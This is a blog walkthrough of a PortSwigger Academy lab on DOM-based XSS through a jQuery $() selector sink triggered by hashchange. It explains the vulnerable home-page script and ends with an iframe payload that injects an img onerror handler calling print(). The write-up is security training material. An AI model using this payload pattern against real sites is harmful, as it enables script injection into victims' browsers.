Open in app

Sign in

Write

Sign in

Solving Portswigger Academy: DOM XSS in jQuery selector sink using a hashchange event

Vishal
3 min readOct 6, 2024

This lab contains a DOM-based cross-site scripting vulnerability on the home page. It uses jQuery’s $() selector function to auto-scroll to a given post, whose title is passed via the location.hash property.

To solve the lab, deliver an exploit to the victim that calls the print() function in their browser.

When we access the lab, we found that it is a simple blog site. It don’t have any search functionality on the home page.

I again looked at the comments section, but as per description the vulnerability is on home page.

Then I looked for some code on home page itself and opened the Inspect element and start going through everything. Then at the bottom I found a script section.

So the $(window) shows it is jquery. The onhashchange event occurs when there has been changes to the anchor part (begins with a ‘#’ symbol) of the current URL.

http://www.example.com/test.htm#part2 — The anchor part of this URL would be #part2. To invoke this event, you can: Change the anchor part by setting the location.

So when the part after # change the function is invoked. In that function, a variable post is defined.

The decodeURIComponent() function accepts a string value representing an encoded URI (Uniform Resource Identifier) decodes it and returns the result.

The Location Hash property in HTML is used to return the anchor part of a URL. It can also be used to set the anchor part of the URL. It returns the string which represents the anchor part of a URL including the hash ‘#’ sign.

The slice() method of Array instances returns a shallow copy of a portion of an array into a new array object selected from start to end (end not included) where start and end represent the index of items in that array.

The code section.blog-list.h2:contains is used to get the blog name.

And slice(1) removes the # sign. The if statement is used when the post is found i.e the word after the # sign then the particular post is scrolled and automatically view to the user.

Let’s add an XSS payload after the # sign and see what happen.

Able to trigger XSS. Now we need to send this to victim which calls print function in browser. We need to use iframe here to deliver it to the victim.

<iframe src=”https://0aa200fc0387923a80d145ae00400028.web-security-academy.net/#" onload=”this.src+=’<img src = x onerror=print()>’”> </iframe>

Save it on exploit server and deliver it to him.

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Vishal
Vishal

Written by Vishal

14 Followers
1 Following

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams